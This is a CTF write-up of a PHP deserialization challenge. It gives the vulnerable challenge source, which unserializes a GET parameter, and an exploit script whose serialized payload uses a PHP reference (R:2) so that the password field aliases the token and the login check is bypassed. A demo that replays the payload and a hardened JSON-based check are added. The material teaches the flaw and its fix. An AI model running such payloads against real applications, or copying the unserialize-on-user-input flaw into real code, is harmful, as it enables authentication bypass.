Source code
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
    public $token;
    public $password;
    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }
    public function login(){
        return $this->token===$this->password;
    }
}
$ctfshow = unserialize($_GET['ctfshow']);
$ctfshow->token=md5(mt_rand());
if($ctfshow->login()){
    echo $flag;
}
 
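Approach
We only need password to be strictly equal to token. token is the MD5 hash of a random number, so brute-forcing it is very hard. Instead we can use a PHP reference, which is similar to a pointer in C: if password is a reference to token, it takes on whatever value the script later assigns to token. I happened to do a similar challenge on BUU a few days ago.
Solution
exp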
<?php
class ctfshowAdmin{
    public $token;
    public $password;
    // public function __construct($t,$p){
    //     $this->token=$t;
    //     $this->password = $p;
    // }
    // public function login(){
    //     return $this->token===$this->password;
    // }
}
$a = new ctfshowAdmin;
$a -> password = & $a -> token;
echo urlencode(serialize($a));
// serialize($a) before URL encoding:
//O:12:"ctfshowAdmin":2:{s:5:"token";N;s:8:"password";R:2;}
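
The following is an added example, not part of the original write-up or the challenge code: it replays the serialized string above against the same login logic to show the effect of R:2, then contrasts it with a hardened check. The names vulnerable_check and hardened_check, the JSON input shape and the server-side token are assumptions made for illustration.

```php
<?php
// Added example: replays the write-up's payload, then shows a hardened check.
class ctfshowAdmin {
    public $token;
    public $password;
    public function login() {
        return $this->token === $this->password;
    }
}

// Same flow as the challenge source: unserialize, overwrite token, compare.
function vulnerable_check(string $input): bool {
    $obj = unserialize($input);
    // If password is a reference to token (R:2), this write changes both.
    $obj->token = md5(mt_rand());
    return $obj->login();
}

// Hypothetical hardened flow: accept only a scalar from the client as JSON,
// which has no object or reference syntax, and compare it in constant time
// against a token that exists only in server-side state.
function hardened_check(string $input, string $serverToken): bool {
    $data = json_decode($input, true);
    if (!is_array($data) || !is_string($data['password'] ?? null)) {
        return false;
    }
    return hash_equals($serverToken, $data['password']);
}

// Payload from the write-up: slot 1 is the object, slot 2 is token,
// so "R:2" makes password a PHP reference to token.
$aliased = 'O:12:"ctfshowAdmin":2:{s:5:"token";N;s:8:"password";R:2;}';
// Constructed control input: password is an ordinary string, no reference.
$plain = 'O:12:"ctfshowAdmin":2:{s:5:"token";N;s:8:"password";s:1:"x";}';

var_dump(vulnerable_check($aliased));  // reference payload
var_dump(vulnerable_check($plain));    // control payload

$serverToken = bin2hex(random_bytes(16));  // constructed server-side secret
var_dump(hardened_check('{"password":"guess"}', $serverToken));
```

Run with the PHP CLI: only the first call reports a successful login, because the client never gets to shape how the secret and the guess are stored in the hardened version.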
 
Summary
An easy challenge.










